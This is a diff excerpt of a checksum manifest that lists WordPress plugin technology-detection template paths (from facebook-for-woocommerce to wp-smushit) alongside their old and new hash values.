+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:6ed2e87467ca018c648d3db7f509f4f10ceb0408 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f77e4aeba440ea787ea49dfa5887a4820153fc66 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:67e78904fe07f5daeeb449ea85a47c41bbc4bc8d +http/technologies/wordpress/plugins/flamingo.yaml:4d3f2731a6e0bdd229fc8ddbf026e8b934c998b8 +http/technologies/wordpress/plugins/fluentform.yaml:aa0746ae7c4cc4ae3f40ed36ccea8671ba1dc530 +http/technologies/wordpress/plugins/font-awesome.yaml:8066630d6219bd795f36f1f178c6ace6b9213811 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:f34b3fcce3eefa6a05c912368402fe943b8acb19 +http/technologies/wordpress/plugins/formidable.yaml:9b1c9cb1f812222b2b019b7683763703344f6d8f +http/technologies/wordpress/plugins/forminator.yaml:75e2e7576c463685bcc136a881ff957d750fcd65 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:4408b724b589ee76e8f5fd51d52e1f29d92d1372 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:dd0616ab46fff1580a003d30231c037f290e5b54 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8fb6e5862414ce4e87352d3d29e02e09893670d1 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:9f661baa8aab517de2e49f80e2b6cbe23f8e4c84 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8018ec8677e69a104ade96e8a2cd21e148ebff71 +http/technologies/wordpress/plugins/google-site-kit.yaml:62b6ce4ca253b98d06807b68ddc3337d2b7ca800 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:86d20e3ca4c800f34018f81ba1e8e6cc8d5c2db4 +http/technologies/wordpress/plugins/gtranslate.yaml:9db904e930110cad0a0914c3e07ac089f02f0c98 +http/technologies/wordpress/plugins/gutenberg.yaml:04775a20fd07d0a16a960830b3c7fa1a55229ed7 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:988c1b228ae6a93e503955e99f9f106fe314e041 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:9b63c25150c895c9bcbb42d5028bb65fa6443041 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:757681179db8466201f306c8a5bfcf8b7b552d50 -http/technologies/wordpress/plugins/header-footer.yaml:368cb28857df369b212a9a90095081011f770b6e -http/technologies/wordpress/plugins/health-check.yaml:789e1c9f132000b4c5616b30629e6f37e199150d -http/technologies/wordpress/plugins/hello-dolly.yaml:d57a592eb2a04ed22c7bb6c65ed75856fb5b5378 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:53850f03b37a3d97eb419a187401944b3dbd032e -http/technologies/wordpress/plugins/imagify.yaml:891b39fa644755432fefc29039dddcf215235dcb -http/technologies/wordpress/plugins/imsanity.yaml:a613eb1092193e438cb2f2f329b7d810981e57ac -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:ce0165dd5d8612307f29c3a165f549a7c1034c36 -http/technologies/wordpress/plugins/instagram-feed.yaml:05e194f3fee32eb16d7d234f3c5c4826bfa9af06 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:03463ef2a1e8cefebcea60fd2ffcb09d39954deb -http/technologies/wordpress/plugins/iwp-client.yaml:63936c412cd07e2769d9b2b28915e4c62fda76d2 -http/technologies/wordpress/plugins/jetpack-boost.yaml:279133a2bbc8a5f0eb4e8a41bfa0489d13f7830f -http/technologies/wordpress/plugins/jetpack.yaml:564f100225344a62547527ed62a3285b0b4bdccd -http/technologies/wordpress/plugins/kadence-blocks.yaml:0649d67617932b4441519366387ba35e7d52f54a -http/technologies/wordpress/plugins/kirki.yaml:f4871c07e6533ae698269ee62516e18381e8aa67 -http/technologies/wordpress/plugins/leadin.yaml:ece3ffad9e03b28fa226ca12596223d496933217 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:6745011f2a5b9ed2239d77146b9c50de3d4ae35d -http/technologies/wordpress/plugins/limit-login-attempts.yaml:dc6984f12d03cf293ba2cf0db4a20939fbbcc85b -http/technologies/wordpress/plugins/litespeed-cache.yaml:4816bb70c3a34f10a3787a6a9321bc5b0a2bdaec -http/technologies/wordpress/plugins/loco-translate.yaml:f07f249c121583a4b716708bdee960700cb4aa18 -http/technologies/wordpress/plugins/loginizer.yaml:f6e618f7e747623ea0ed0834d8ecd676a7e2f7d9 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:81d4ced3c786afd893816bfebb7140a2dc6f4558 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:71e62350350de59daf667a50a26b648084cc4ab6 +http/technologies/wordpress/plugins/header-footer.yaml:174148584b142ec038fc7a0f9176a18eb9c098db +http/technologies/wordpress/plugins/health-check.yaml:eb6631df175e58a0b119b7538d9672658c81f21a +http/technologies/wordpress/plugins/hello-dolly.yaml:a2f5e0e7641ea6debb64beeefd1a4af85d97280c +http/technologies/wordpress/plugins/host-webfonts-local.yaml:7c45ba2dc73709601db1a3869bd5bddd88384071 +http/technologies/wordpress/plugins/imagify.yaml:9c4f02fda5dc1aa5482e5fabf8d6bbf375055304 +http/technologies/wordpress/plugins/imsanity.yaml:67d29f1be228b9b14df5de942774fecedb444e65 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:6ae816e7253a38d8c0846abd90c18ca8ffea8f34 +http/technologies/wordpress/plugins/instagram-feed.yaml:1d3d97fc52d5b095a463b9ed2b9a396f7f17b97f +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:9c330ec944213e21ed8c7ab6cad1460459e81bc4 +http/technologies/wordpress/plugins/iwp-client.yaml:f88e0cf2e4152e6b902e82c361f0d131a22e00ec +http/technologies/wordpress/plugins/jetpack-boost.yaml:8b44bc711e9a20fe57090853224817b63ab0d62b +http/technologies/wordpress/plugins/jetpack.yaml:b929f76617b1123daa7fca98aee35f061d39c4e2 +http/technologies/wordpress/plugins/kadence-blocks.yaml:2511a3d7cb860f7cb14f41422c98898dc7f9894d +http/technologies/wordpress/plugins/kirki.yaml:2b3245d8cda5b94451dbec75cbeaea1af5ac0337 +http/technologies/wordpress/plugins/leadin.yaml:668bde42efcb43731a952336065f329ce61e9781 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe8bed8a150e31053cc37219d31bcc4c9f328588 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:6e97ac1e6040f16ad192e29d5845bab10d44fc27 +http/technologies/wordpress/plugins/litespeed-cache.yaml:7fa946f1b0f30d111bfe2cab883e1e7b9c6cbc1c +http/technologies/wordpress/plugins/loco-translate.yaml:ce0cf28e3d123123adfcf1622efee14f43ed39f9 +http/technologies/wordpress/plugins/loginizer.yaml:fc52596cb75f53389d233bae7f3b8be9a3fc6932 http/technologies/wordpress/plugins/loginpress.yaml:6bff3449a9e63df8989b80f20668802bcfa63e5e -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:da7358be5f1c6ae0c7f515e19aa8f6083929ae33 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:cff4b95cd18a5c163d08072d2be8d5340a5a28a0 -http/technologies/wordpress/plugins/mailpoet.yaml:503ed3ea3d4e8805c63e613363aec5e6ebc01353 -http/technologies/wordpress/plugins/maintenance.yaml:32189fcd43c056421eceb168f69cc5caedc7af3a -http/technologies/wordpress/plugins/mainwp-child.yaml:15689dfb6b573c4c817465ce5243768172ad52bd -http/technologies/wordpress/plugins/malcare-security.yaml:2e1c5cc7bbcee8720e6c6cb412b2858fac248688 -http/technologies/wordpress/plugins/megamenu.yaml:db943d14db9683181f9a323b944f02452287e9a8 -http/technologies/wordpress/plugins/members.yaml:c6653517731d44a546a8350889a54a87d66c1c97 -http/technologies/wordpress/plugins/meta-box.yaml:0bbb6235d7e92583c1f7eb18434de2f550f57a8b -http/technologies/wordpress/plugins/metform.yaml:335cb7e049844ad939ebdc118311cd117fd33b0b -http/technologies/wordpress/plugins/ml-slider.yaml:4c0ea0ddbe7470ad7ed2b61cd60463fba4d4bce9 -http/technologies/wordpress/plugins/newsletter.yaml:4e06e8bc420c388cc3efb16589edd1d47538fb1a -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:794e9a51fe4bfbea704702f24226525fb9ec9d8d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:d7bcf4488f9d9025682db9609b0d3f153ca41ee4 -http/technologies/wordpress/plugins/ninja-forms.yaml:deb98355ab94d563cf8df50f40117301ef8101bb -http/technologies/wordpress/plugins/ocean-extra.yaml:e8ae0f4fd381aa3a324d89cdd3ba601e43f3fff7 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:647d02f790ae7cc8a0a3dfccea4778798c768625 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:a1ad19ac87ae4baf1d3ce9669e6eccbb744d0e8e -http/technologies/wordpress/plugins/optinmonster.yaml:49614dff30c56429fcafdcdab4971f55291cd894 -http/technologies/wordpress/plugins/otter-blocks.yaml:50a70501e3ba00f21a2f8f87c39d1391a9da2150 -http/technologies/wordpress/plugins/password-protected.yaml:e7daaf683e06fe00c3593257fc3f62d671078f48 -http/technologies/wordpress/plugins/pdf-embedder.yaml:0083ed9b30aea7fae9ecea826fba16e05206d27c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7519cc0e495f2044aff9cbce68c398f8e1d14d3c +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:a5bc287d1a869887101fc25381a3c1803e94ca0a +http/technologies/wordpress/plugins/mailpoet.yaml:b7ec029dede28a2d447ab52a5be42b2c980d25c3 +http/technologies/wordpress/plugins/maintenance.yaml:f619ed3b4771fad7f77822d3d1aad49e1748fd04 +http/technologies/wordpress/plugins/mainwp-child.yaml:1a06475605be6cc0112c3cdd83d376f2a47ea6fd +http/technologies/wordpress/plugins/malcare-security.yaml:5c927904f6c3289343dfbef17f5dd567461f604d +http/technologies/wordpress/plugins/megamenu.yaml:d65d78322eb3237162730a3847c4aaa7c5b56a51 +http/technologies/wordpress/plugins/members.yaml:99e5252b1eb33b67f58ab299335fa20b5ac970bc +http/technologies/wordpress/plugins/meta-box.yaml:cde63d6382ff952fcfd6d9241ef936beb46059c2 +http/technologies/wordpress/plugins/metform.yaml:336cab47e024f8f5d89145e8a27b9ea680bdb045 +http/technologies/wordpress/plugins/ml-slider.yaml:e4c2d96eb679a9e8e0b29bee148e776f119b7ede +http/technologies/wordpress/plugins/newsletter.yaml:6cdcc981691dbddeabc0398513af325721df360b +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:f20c7918be751b1caf7db027ca47d31c63131c21 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:3b2ffb8b75979c01b5a3761a69694b5deb45eb18 +http/technologies/wordpress/plugins/ninja-forms.yaml:50d338f09ac6b4d2c1d94dedd239222ba9a86514 +http/technologies/wordpress/plugins/ocean-extra.yaml:1e110fda1cf79cf650f9f820ebaafe8a2857c912 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:de9a5ae21027f63d3246a8375470f473d2044306 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:527d2f134d7e4b652378aea7d33cc41d3342e2be +http/technologies/wordpress/plugins/optinmonster.yaml:cc4d26873bb15be9a01c230bec77e319d7de9f77 +http/technologies/wordpress/plugins/otter-blocks.yaml:ab2928e5a4e8752772a901b1c68207fad99c35df +http/technologies/wordpress/plugins/password-protected.yaml:b1b706fdab4200f830c1b1beb1fbe666933592de +http/technologies/wordpress/plugins/pdf-embedder.yaml:4ed70ebb1eeee74c604da68b44aa55ece0ec99e3 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:659447b8573051f9c70a0583cfa878a495b3a855 -http/technologies/wordpress/plugins/pixelyoursite.yaml:58c90dade9bb03bccc83feaf85ba8f69ea28bbd3 -http/technologies/wordpress/plugins/polylang.yaml:bbb9668557efcd1c9edf2191f41fabc7c712f42c -http/technologies/wordpress/plugins/popup-builder.yaml:fdc7d81f7193a928634e92a5947b9fe203ec4975 -http/technologies/wordpress/plugins/popup-maker.yaml:60b5b11368519938244a75a6ab7a24b72fffd24a -http/technologies/wordpress/plugins/post-smtp.yaml:64807380e180b14a2fd79d3e72ac42882ec2a29a -http/technologies/wordpress/plugins/post-types-order.yaml:68b2e3574b4b1c2626ef6ef3adfba2ae8576645f -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:67e1c8db1ce351d4dac481a8b8e6ee5e2e6530e5 -http/technologies/wordpress/plugins/pretty-link.yaml:c20d198357e9b0d5a18c6467d74500a0f8c50dc1 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:d07b0ef1b1650b199645ee4310d633a09c91bd16 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:fb1b4fa2370f9c0d74f7de8b822373fa2d4e3bbc -http/technologies/wordpress/plugins/redirection.yaml:7977c25454c435b6d90d134af33ceef3c7d5b040 -http/technologies/wordpress/plugins/redux-framework.yaml:6660fc2c43ec018bd0c07abfb2131a3b0ffee2bc -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:7ab49be947a030ad8c6b7c4fc4bb4025622f1d9f -http/technologies/wordpress/plugins/safe-svg.yaml:0a47ebbc5ed328fc815ea5b3bad887005a30e0a6 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:874c041db9a2d8ac2d15a0f47ef760d132dbe813 -http/technologies/wordpress/plugins/sg-cachepress.yaml:53fe7b0b2ea386ba45078740d5d4e41403f05fa7 -http/technologies/wordpress/plugins/sg-security.yaml:3c6be8ea24c70c03e98a7b4e0acd31e1b88da46b -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:f5166b1f2a4cea3d18cd5d79c255333e96891725 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:fe022ae2dcc73ba03dbafac0ea70765058de3356 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f8c71c0b17feff1c8bbda1af251bc3ef60420d53 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:b5b4c3bfc0fee87311cb2cc03cb6c4a82a1cafbb +http/technologies/wordpress/plugins/pixelyoursite.yaml:66fe534a71cce592ccf060695da99783350a562a +http/technologies/wordpress/plugins/polylang.yaml:b3a2c035891b45b9874107087c5711fe03224845 +http/technologies/wordpress/plugins/popup-builder.yaml:f312d028f9d71e5a9f58d6b69fb8e46c9e92b7c7 +http/technologies/wordpress/plugins/popup-maker.yaml:536d16663f1577f75e52f64e99b24f07e139d08b +http/technologies/wordpress/plugins/post-smtp.yaml:aae7092ef47fd3d4d294f9c391891551b94ef8dd +http/technologies/wordpress/plugins/post-types-order.yaml:dd6246fe3345d10e645b0e93d4cf9be73b0739de +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:6fdbd425f95d007e32f81fe2c355d0489e13194e +http/technologies/wordpress/plugins/pretty-link.yaml:1c8ed9edd4e0b0dbf5bee09b8776aa267c7a1958 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:81aa4c399baf62aa242505a0d7c91d3b3c55b76c +http/technologies/wordpress/plugins/really-simple-ssl.yaml:da0a4392e219961605c265ea4b0603998342b9ea +http/technologies/wordpress/plugins/redirection.yaml:835912399aba462b81b01c5769c7e7f997319132 +http/technologies/wordpress/plugins/redux-framework.yaml:db97b4cfe2a3c4060fdc4ad4444112ede8852c0a +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:314f5fab2d2447b5b69990ba1b7af0b6f8cfb5d3 +http/technologies/wordpress/plugins/safe-svg.yaml:c8ba235d3c680a0a171e63d8c6cc4b4ee05f2ecb +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:99d6c2206caa06465409be292eadeaa04b6e36c6 +http/technologies/wordpress/plugins/sg-cachepress.yaml:e273600393b5d512f4725afe9ca3b86f234cea87 +http/technologies/wordpress/plugins/sg-security.yaml:1cca5ff059ea7bb306bad806a263ee809e4cf84d +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a4087f1d3e523664303c81c3c9e7f0c609028b0e +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:43f5a1bed56afc9f55087b545a8e68893d556f1d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:1b67ed581b643e6bd7f5e7cdcee41004aa273954 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:ef57035687f18b406c5afc7f62f8907ab0b4b72e -http/technologies/wordpress/plugins/siteorigin-panels.yaml:1ebf46dfbd8710133f6adbe14c0d420f38a3cfd3 -http/technologies/wordpress/plugins/smart-slider-3.yaml:de9a0e20d9c791a854c34904ab769be0cd415d05 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:ca9ff24f27cbad632b1730f97e6a139783e87ba5 +http/technologies/wordpress/plugins/siteguard.yaml:718231f7a7b4511567b24938f52b5adc3312364b +http/technologies/wordpress/plugins/siteorigin-panels.yaml:c981639bdd633001fd24fd2f8689e43d7639411b +http/technologies/wordpress/plugins/smart-slider-3.yaml:960b9f43fda3502029e20386a508e0005a615fd3 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:d7f156f16c4fe10d04bd8a329388634742ca19bf http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:f2b246dfbedf803106177eddbc2f4e87da237801 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:d3fe7081e83b9736799980f273039480b974c2d4 -http/technologies/wordpress/plugins/svg-support.yaml:39b60996c4ad62c133cd1903d1e460fc35197085 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:22a26259acbed43640ec7d4c2bbda8bd5225408e -http/technologies/wordpress/plugins/tablepress.yaml:a8d3eb2dc6364b9ebf467bdb8177bb00a24ee42f -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:5160d169b2b7696c52d6e607630867297866a84c -http/technologies/wordpress/plugins/the-events-calendar.yaml:c4e097307f6827cbf735d6938508a6c8c5727585 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:f5f0d43cff1e6eae0e490f3357abc752eff0f10c +http/technologies/wordpress/plugins/sucuri-scanner.yaml:24db70cad4ab8fe1628198eb0e0e0e89233f5884 +http/technologies/wordpress/plugins/svg-support.yaml:f89491ae986b66cee4f7969d3ab41d8503051d15 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:8c4e657e02733238b4a7dd5619b107228edc864e +http/technologies/wordpress/plugins/tablepress.yaml:f4f7a611f85be0316c062084b6c781463cafe7d2 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:723e0b1a554778383f77ae2125e5ee21ec673953 +http/technologies/wordpress/plugins/the-events-calendar.yaml:dbe4402946fb78fc90121fb706328fff73bcedd9 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:d9e084b608873fab462532369a3595d802c8bc62 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:c4a2d0a6d2f16b4e0e8d941ebb91b2672fb76572 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:4e63ffde0f1b54be5de4ce1ebc3620a1205fec17 -http/technologies/wordpress/plugins/under-construction-page.yaml:9358ed0f4d0194183a9fe42fb87f53d81d995ab0 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:d15856e0b1bcad8aa826a0be90dd371d923bd734 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:eb919ee4cfd9dce6e96825a74a625eb676a489bc +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:05a175f52e9e7cb2f0b86aa99b6d766149669c91 +http/technologies/wordpress/plugins/under-construction-page.yaml:2c78b156d07379df9d681c9b91551ab2ad49d6b5 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:bbdb8997d8287b0cf6ab3efa7a624f572bd71b53 -http/technologies/wordpress/plugins/use-any-font.yaml:05d1ca04b977c10fcad82b450c0acd4fefc9d7a0 -http/technologies/wordpress/plugins/user-role-editor.yaml:c10fc4323694ff50aa82d6835d3b1d5789eea9c1 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:45019550e554d274a8c8aefa213bbb8f6551e659 -http/technologies/wordpress/plugins/w3-total-cache.yaml:8144ccc62bb23635a42ca843711d181efee2a006 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:87e59d15ca0729b95f00df5136e718e811cd82d3 -http/technologies/wordpress/plugins/webp-express.yaml:a74cfb74b0f00e49da9ba99be5a0d11a830b1013 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:422798c6210811ad29233af5d814a04642587ec5 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:bf82396698dc84db2ccd72fbe3848748283a3717 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:e9d252c9a771091207e58df09621d53dab1bd856 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:9eb475bbcf18f3c54352cd359fa541fcca9639af -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:ff36f1b5ce9276f3299839a15d3633e1541097ea -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:6a85abae8c9b29cf131c85a70bf53c0a12b68fe4 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d8e2dd330c703df4380fe915c72b0568c385f19f -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:3bc661af472214bc203fffa96e683564afb1a8a7 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:b03ffe3e2b8fb8bba419a9e6f7c2edc2d332c68c -http/technologies/wordpress/plugins/woocommerce-services.yaml:6a6e18cfc85fd8345cd5cac8202e549b82b074ec -http/technologies/wordpress/plugins/woocommerce.yaml:858a5e7ac72875ffccb1ec7e9c12b49aeb5c1700 -http/technologies/wordpress/plugins/wordfence.yaml:36a1eb073254face2acea4adb9a66cbbc33fc385 -http/technologies/wordpress/plugins/wordpress-importer.yaml:e8cdb78819fe2a8f6290529839a711717d92e7fe -http/technologies/wordpress/plugins/wordpress-seo.yaml:b3dc534c0d96b2e17b590a1956cef829d08b9890 +http/technologies/wordpress/plugins/updraftplus.yaml:8b519c134551702d323c3bdc98c425ce9ea7b870 +http/technologies/wordpress/plugins/use-any-font.yaml:6f300d6a8f6cda514261442eab4dce018d96164e +http/technologies/wordpress/plugins/user-role-editor.yaml:977b5a06a0d66bfdb20e8d7affc9cc015ba1c3ef +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:ce2c16f50af3d10f91775b181420d60e4ffff748 +http/technologies/wordpress/plugins/w3-total-cache.yaml:fa988e7ed1b786c198a4593930152b0ecef3a599 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:0de88c3e9d74df84cb8da9c83d276a1f8cf77384 +http/technologies/wordpress/plugins/webp-express.yaml:5c68bb282d23b65f788cfb80122a085320fc5397 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:88fa3e8cf3c26bd52de166f8da2622303bcfda19 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:5a9d12a717d2e61b31ad735a56b058a715d3cbc2 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:1a30d011d59554516518da28cdb9adc6267433a5 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:a710275e71c6c3a292afcec76233b2824b1511d9 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:87823db97e571b8bf36532a586c77e63d7b8102f +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:4b8e949ba5877f92d83a2146c5e9f428a0743838 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:cc18d2c0a10a51cfe0ee4c4a11017547dc75c470 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:0182e458814d1a0ca3783ccb13316477a5c09dad +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:61ff0fdcc011dc336df3d5f26ee5224c6da9eb2f +http/technologies/wordpress/plugins/woocommerce-services.yaml:70062279bb6fa43c9c4d45f6d494cd2421a4d6a6 +http/technologies/wordpress/plugins/woocommerce.yaml:b3cc9b84e60008a53349cdfdd58713fd6a6cc2b3 +http/technologies/wordpress/plugins/wordfence.yaml:60a87b3e9b1e1b01c04026bdedbffc22394e14bf +http/technologies/wordpress/plugins/wordpress-importer.yaml:b72f0b998e1f9dc1de9a1d15048fd6f9aacee14d +http/technologies/wordpress/plugins/wordpress-seo.yaml:0399801a34d59ef1bc26145d3f3ceaebb9a4affa http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:e13d6c2c1b9fa56ba7942c2d70530bdb8e16ae46 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:2db83f23af8f32ad154ddf61c8a63d4420a4cf8e -http/technologies/wordpress/plugins/wp-file-manager.yaml:3c57d1ea0a120e33ef0b42e009cdf43a12fd260a -http/technologies/wordpress/plugins/wp-google-maps.yaml:805376e24f870551aed1dde5167b17220883594d -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:5cedfab5bf1a79b756026502f3af8575d46902f2 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:09355893649a9d8e6a5244d992a5815c2bd58653 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:0ea37ee399e0f05c668008e62efffa155d132f1d -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:347970d7f3b412a76f12f9e9c39709ae6e8b8275 -http/technologies/wordpress/plugins/wp-optimize.yaml:4ec5073ec536b860e8e17456cac813c92040e0ed -http/technologies/wordpress/plugins/wp-pagenavi.yaml:505a46fb2beec2316a7dfe8e07eedcb2133630ce -http/technologies/wordpress/plugins/wp-reset.yaml:e3404a20a51e3ba8ea925c992a7584ed33f1eae2 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:90b60cd984f850bdaa9497e929e415dcc02d8b8b -http/technologies/wordpress/plugins/wp-rollback.yaml:33258d5ad22f35b88b468083165ce3a21a257a4e -http/technologies/wordpress/plugins/wp-seopress.yaml:b5ee71fea5abcd0a22b33248430d29c3734fe16e -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:c155a32945fbb5c8542f549291862ac033e676f9 -http/technologies/wordpress/plugins/wp-smushit.yaml:91e79174bf04883af70959be716fd0ada36e6e08 -http/technologies/wordpress/plugins/wp-statistics.yaml:f8c7ccf56d1b551a98328896e77031ae904b57ab -http/technologies/wordpress/plugins/wp-super-cache.yaml:e630a1b6d79fd4f071661794841e2eddec44d3fe -http/technologies/wordpress/plugins/wp-user-avatar.yaml:51665e9c141bd286d76e691460ad4de0349481b4 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:cd947bed2948970ae225dfff8cf3e6d095844db6 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:38104d9a3e83b5735a8c6b0e4023071a20c4ca03 -http/technologies/wordpress/plugins/wpforms-lite.yaml:4cc04c7a7c8fa70b7fdd16ac9b25242d55f0de18 -http/technologies/wordpress/plugins/wps-hide-login.yaml:bcce630e43720ed229b9fa709d509040293743ce -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c643aa481e4f1b7a874facecf6d47dcfdb64cd29 +http/technologies/wordpress/plugins/worker.yaml:af23a901bf80d99add13c4487696bdd6922b1b0d +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ce5922d284bb857ed7afefd4ba6f4ca4140f5849 +http/technologies/wordpress/plugins/wp-file-manager.yaml:4525a86be3a222f8c1274789915c99250217d728 +http/technologies/wordpress/plugins/wp-google-maps.yaml:4ddc4a343ec43800fa1238f3a63116780bc42c54 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:8c5166a4c4afea93360ba7b6d06d6dac3602e9c2 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:118d7cd631ab95da33df1a7bc6a6e1524345b1d4 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:22b3594e166bb0bc071febb617c305dcc8673dad +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:f2d148d6bfa8d2fef2b4efa8a66b21ca9bdc150d +http/technologies/wordpress/plugins/wp-optimize.yaml:fdadc751abc7de67d698fc8a95e1b4c20b6c6cfc +http/technologies/wordpress/plugins/wp-pagenavi.yaml:263c292280c818616ed5756870fb62c6773aaca0 +http/technologies/wordpress/plugins/wp-reset.yaml:72b0d50aaf800e5ccbf53ffc1888fd2f95acbd92 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:4a14cad24c210b39deedd0e716565f103a6654f4 +http/technologies/wordpress/plugins/wp-rollback.yaml:c907566b208ca943668d452595bb432586fec1ec +http/technologies/wordpress/plugins/wp-seopress.yaml:8ee93a7434528fcab1a00e1ee304bf1611ac01de +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:7727babe8e95a25f88c4624d1483681a044ff339 +http/technologies/wordpress/plugins/wp-smushit.yaml:93967a45ff8e1a3f66f6cebdd4237a60711a9dc2 